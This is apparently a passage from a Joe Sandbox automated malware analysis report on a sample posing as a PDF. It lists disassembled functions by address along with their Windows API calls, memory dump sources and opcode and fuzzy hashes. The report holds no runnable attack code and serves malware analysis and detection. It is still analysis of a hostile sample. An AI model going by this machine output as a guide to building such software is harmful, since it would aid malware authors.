                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: 0602ebbd60bb34137f51de7fac14ea3bda7f5b14ebeb6395298129d1792ebcf0
                                                    • Instruction ID: 89fded50bb46eedaa72d47453be115be2f8e1a0d8d8b6c06631e3f02e9c1fccd
                                                    • Opcode Fuzzy Hash: 0602ebbd60bb34137f51de7fac14ea3bda7f5b14ebeb6395298129d1792ebcf0
                                                    • Instruction Fuzzy Hash: 2911AF36200305AFDB27AF64D805D7A77A8FF45314F8140AAF806CB260EB71E845C7A0
                                                    Function 00372F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00372FB5
                                                      • Part of subcall function 0036395C: __FF_MSGBANNER.LIBCMT ref: 00363973
                                                      • Part of subcall function 0036395C: __NMSG_WRITE.LIBCMT ref: 0036397A
                                                      • Part of subcall function 0036395C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: bad1a5115ac50e0ef39aca781ef98f75cce9434ee3deb56e7ca51cf43213dc02
                                                    • Instruction ID: c1c7081c68ee90ec89388b94ea781ecb7ea090d4d4a4746372509d925968061c
                                                    • Opcode Fuzzy Hash: bad1a5115ac50e0ef39aca781ef98f75cce9434ee3deb56e7ca51cf43213dc02
                                                    • Instruction Fuzzy Hash: 67110632409216ABCB333B74AC4466A3BA8AF04364F21C825F84EDE165DB39C940AB90
                                                    Function 0038058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003805AC
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003805C7
                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003805DD
                                                    • FreeLibrary.KERNEL32(?), ref: 00380632
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                    • String ID:
                                                    • API String ID: 3137044355-0
                                                    • Opcode ID: f66648ba8498cfd7ae89ae221226b0b5437b081239853ff73747c572fa268138
                                                    • Instruction ID: 41f9e70c78f9979afcca4079f102ae8b8c9400c7ae8e3f17a6cb7a501362882f
                                                    • Opcode Fuzzy Hash: f66648ba8498cfd7ae89ae221226b0b5437b081239853ff73747c572fa268138
                                                    • Instruction Fuzzy Hash: 82218471900709EFEB66AF91DC88EDABBBCEF40700F0084A9E51696450E774EA59DF50
                                                    Function 00386713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00386733
                                                    • _memset.LIBCMT ref: 00386754
                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003867A6
                                                    • CloseHandle.KERNEL32(00000000), ref: 003867AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                    • String ID:
                                                    • API String ID: 1157408455-0
                                                    • Opcode ID: 6c4b388054425cb1455d6d18b2562152a67d995b5c9b3ed0ab3432ae124f7e6c
                                                    • Instruction ID: dd8dc200338287885e73b07345b88c9208451cf3297bd22a8bd4afe4551fd8b3
                                                    • Opcode Fuzzy Hash: 6c4b388054425cb1455d6d18b2562152a67d995b5c9b3ed0ab3432ae124f7e6c
                                                    • Instruction Fuzzy Hash: EC11CA759012287AE72167A5AC4EFABBABCEF44764F1041EAF504E71D0D2745F808BA4
                                                    Function 0037B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0037AA79
                                                      • Part of subcall function 0037AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0037AA83
                                                      • Part of subcall function 0037AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0037AA92
                                                      • Part of subcall function 0037AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0037AA99
                                                      • Part of subcall function 0037AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0037AAAF
                                                    • GetLengthSid.ADVAPI32(?,00000000,0037ADE4,?,?), ref: 0037B21B
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0037B227
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0037B22E
                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0037B247
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                    • String ID:
                                                    • API String ID: 4217664535-0
                                                    • Opcode ID: 58772ec42805bd110c7503656c89539b0c48cf5aad2c34b13b004dd5d4e2f088
                                                    • Instruction ID: a6ad6a0e6b15bcfd8315bee66c9b8d2344ef544dc5d9c6af6f59b194cdee17f7
                                                    • Opcode Fuzzy Hash: 58772ec42805bd110c7503656c89539b0c48cf5aad2c34b13b004dd5d4e2f088
                                                    • Instruction Fuzzy Hash: F211BC71A01205AFCB269F98CC84FAEB7BDEF84304F14846DE94AD7211D739AE44CB10
                                                    Function 0037B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0037B498
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4AA
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4C0
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0037B4DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: c02d6b2f9d8a2f9663eff918c7384b0e2390215488af724371bf25ebbc5d90ba
                                                    • Instruction ID: 23c9468dc8065a1042317240ae6c4f233c6ea7875f2487c0ce0918beb95d6695
                                                    • Opcode Fuzzy Hash: c02d6b2f9d8a2f9663eff918c7384b0e2390215488af724371bf25ebbc5d90ba
                                                    • Instruction Fuzzy Hash: 0611187A900218FFDB21DFA9C985F9DBBB8FB08710F208091E604B7295D771AE11DB94
                                                    Function 0035B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0035B5A5
                                                    • GetClientRect.USER32(?,?), ref: 003BE69A
                                                    • GetCursorPos.USER32(?), ref: 003BE6A4
                                                    • ScreenToClient.USER32(?,?), ref: 003BE6AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: a12d916a70fabac065edd8ffeb87ee12c0bd74325b31f77aa71fdac64ec954af
                                                    • Instruction ID: b8a12abddfd131a7208d2fe8a85a83aeafc36047570838387b2b6c948662e1f2
                                                    • Opcode Fuzzy Hash: a12d916a70fabac065edd8ffeb87ee12c0bd74325b31f77aa71fdac64ec954af
                                                    • Instruction Fuzzy Hash: 20113631900029BBCB16DF98CC45DEEB7B8EB0A305F500865F902E7150E334BA95CBA5
                                                    Function 0038732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00387352
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00387385
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0038739B
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003873A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: bcea54f14fc1bf8cab4b56f16cb395acf0b46a71998371d7bf7f9b6c46c8a295
                                                    • Instruction ID: 26337d553186dc324c353fcd47771e4612f386e0b51649c54035ace722d4c541
                                                    • Opcode Fuzzy Hash: bcea54f14fc1bf8cab4b56f16cb395acf0b46a71998371d7bf7f9b6c46c8a295
                                                    • Instruction Fuzzy Hash: 6911E576A04304AFC7029F689C09E9E7FAE9B45311F1442B9F825E3251D7B0D90097A5
                                                    Function 0035D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                                    • GetStockObject.GDI32(00000011), ref: 0035D1CE
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0
                                                    • Opcode ID: fafb54190b632c3612ab66c6cd48efbf6ddc607108033aa71c5e4c6e27329cc9
                                                    • Instruction ID: 25b15e5744f82d4dd2b7290c8c5dc1c954ac9f6480d8d8801c3bb516b0864dcc
                                                    • Opcode Fuzzy Hash: fafb54190b632c3612ab66c6cd48efbf6ddc607108033aa71c5e4c6e27329cc9
                                                    • Instruction Fuzzy Hash: AA118B72101909BFEB638F949C50EEABB6DFF08365F050115FE1596060C732EE609BA0
                                                    Function 00374DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                    • Instruction ID: 404711c64041113a05f0df244bc4858b2169913666dcbcec76b633ae58495a60
                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                    • Instruction Fuzzy Hash: DF014E3600014ABBCF275E84DC018EE3F26BB18360B598455FA1C59431D33ADAB1AB81
                                                    Function 00367452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00367A0D: __getptd_noexit.LIBCMT ref: 00367A0E
                                                    • __lock.LIBCMT ref: 0036748F
                                                    • InterlockedDecrement.KERNEL32(?), ref: 003674AC
                                                    • _free.LIBCMT ref: 003674BF
                                                    • InterlockedIncrement.KERNEL32(00C62698), ref: 003674D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 2704283638-0
                                                    • Opcode ID: 2185e8ab6bc85691214bbc41e081a574609488d5be9d8fc808d3f4093471f19b
                                                    • Instruction ID: fd798b09a5f5189161a0ce823e0afdc5e057d1c86bed723cf7ee4ad2560d2f21
                                                    • Opcode Fuzzy Hash: 2185e8ab6bc85691214bbc41e081a574609488d5be9d8fc808d3f4093471f19b
                                                    • Instruction Fuzzy Hash: 5C01F976909A119BC713AF66940E76DBB60BF05718F56C00AF418AB688CF34A941CFC2
                                                    Function 003AEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                                      • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                                      • Part of subcall function 0035AF83: BeginPath.GDI32(?), ref: 0035B009
                                                      • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035B033
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003AEA8E
                                                    • LineTo.GDI32(00000000,?,?), ref: 003AEA9B
                                                    • EndPath.GDI32(00000000), ref: 003AEAAB
                                                    • StrokePath.GDI32(00000000), ref: 003AEAB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: a86f531335dbda1fbd5a5dbe206fe138735bcd68e9eb675d204f1de602c49fa5
                                                    • Instruction ID: 6b19b16d04e33961360f21b90b21ef4c7174a401c65040557e29038e6f5b49c7
                                                    • Opcode Fuzzy Hash: a86f531335dbda1fbd5a5dbe206fe138735bcd68e9eb675d204f1de602c49fa5
                                                    • Instruction Fuzzy Hash: F7F08232005269BBDB139F98AD0DFCE3F59AF06311F084211FE11A50F187756561DB99
                                                    Function 0037C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0037C84A
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0037C85D
                                                    • GetCurrentThreadId.KERNEL32 ref: 0037C864
                                                    • AttachThreadInput.USER32(00000000), ref: 0037C86B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: ad92b9c9c89e8769e4b45aec2965be43c023d103b98d37c7eaeaa88cfd6b7aed
                                                    • Instruction ID: 4f9b9ab5b0ae5b9e1b51af34fad7c9ae5dc0c21f55fc411178936e51e7b74aaa
                                                    • Opcode Fuzzy Hash: ad92b9c9c89e8769e4b45aec2965be43c023d103b98d37c7eaeaa88cfd6b7aed
                                                    • Instruction Fuzzy Hash: 70E06D71141228BADB225BA2EC0DEDB7F1CEF067A1F408029B60DC4461C6B5D590CBE0
                                                    Function 0037B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 0037B0D6
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0037AC9D), ref: 0037B0DD
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0037AC9D), ref: 0037B0EA
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0037AC9D), ref: 0037B0F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    • Opcode ID: 44d04a065dd386f091cbae1b5cfb6e369d35457b14e4c226318bf40af962d3ad
                                                    • Instruction ID: 40f7027a0739169b0df9c275fa7c0bca2bb0303336bf15b2ec71750990162f5c
                                                    • Opcode Fuzzy Hash: 44d04a065dd386f091cbae1b5cfb6e369d35457b14e4c226318bf40af962d3ad
                                                    • Instruction Fuzzy Hash: 63E04F32601221DBD7211FB55C0CF477BACAF55791F028828B245DA040DB2894028760
                                                    Function 0035B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 0035B496
                                                    • SetTextColor.GDI32(?,000000FF), ref: 0035B4A0
                                                    • SetBkMode.GDI32(?,00000001), ref: 0035B4B5
                                                    • GetStockObject.GDI32(00000005), ref: 0035B4BD
                                                    • GetWindowDC.USER32(?,00000000), ref: 003BDE2B
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003BDE38
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 003BDE51
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 003BDE6A
                                                    • GetPixel.GDI32(00000000,?,?), ref: 003BDE8A
                                                    • ReleaseDC.USER32(?,00000000), ref: 003BDE95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: 1d280b02722bbab2541ba537161e328633d825bb5e363c5197e3400e9ba50331
                                                    • Instruction ID: 1689fb2547e4c7141857f156102d7b75c99c41916cf0784316a7aaf4e53e3343
                                                    • Opcode Fuzzy Hash: 1d280b02722bbab2541ba537161e328633d825bb5e363c5197e3400e9ba50331
                                                    • Instruction Fuzzy Hash: 30E06D31100240AFDF231B64AC09FD87B15AB1233AF04C226FBA9980E1C7719580CB11
                                                    Function 003BB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
